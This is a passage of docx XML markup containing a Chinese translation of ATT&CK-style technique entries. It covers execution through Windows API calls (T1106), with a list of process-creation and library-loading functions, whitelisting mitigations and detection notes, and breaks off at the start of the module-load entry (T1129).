          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0E28">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>应用程序加载一些通常无关于程序的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0E28">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0E28">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和其它模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576A4ED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0E28">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>监控微软</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0E28">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0E28">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>应用程序创建一些不寻常的子进程（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0E28">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0E28">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A1E87F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A00453" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05612629" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="389E360F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B019416" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1106</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="069AFBBE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B8634C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C601B8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253CE902" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC3B131" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A7178DE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Stefan Kanthak</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E36D536" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="288CB531" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者工具可能直接使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>PI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来执行二进制文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API CreateProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等函数将允许程序和脚本使用正确的路径和参数启动其他进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FE72D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其它</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可调用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行二进制文件的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3224830A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>CreateProcessA()</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>CreateProcessW(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC3DA5E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>CreateProcessAsUserA()</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>CreateProcessAsUserW(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9D29C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>CreateProcessInternalA()</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>CreateProcessInternalW(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3158AB22" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>CreateProcessWithLogonW()</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>CreateProcessWithTokenW(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA0A26" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>LoadLibraryA()</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>LoadLibraryW(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635422A1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>LoadLibraryExA()</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>LoadLibraryExW(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC157A0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>LoadModule(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4B667F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>LoadPackagedLibrary(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7FA05" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>WinExec(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472F4A3D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>ShellExecuteA()</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>ShellExecuteW(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3FD761" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:lastRenderedPageBreak/>
        <w:t>ShellExecuteExA()</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>ShellExecuteExW()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836AC02" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="41F55E49" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2471A7AA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3739DD8E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="18A9B6F5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D2EFE38" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EDB932C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>适当的情况下，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用应用白名单工具（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows Defender Application Control</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppLocker</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或软件限制策略）来识别并阻止可能通过此技术执行的潜在恶意软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41DCA2C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485D9AF6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0EB412" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用可能会生成大量数据。除非在特定情况下，否则可能无法直接用于防御，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CreateProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>都是善意的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>难以与恶意行为区分开来。将其他事件与通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>发现的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数调用行为相关联可为事件提供额外的上下文，这可以帮助确定事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否因</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意行为而</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>产生</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。按进程沿袭（按进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）对活动进行关联可能就足够了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311EF52D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>模块加载执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="58908CB1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BB082A3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1129</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D905F0A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="769AC278" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A236C82" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
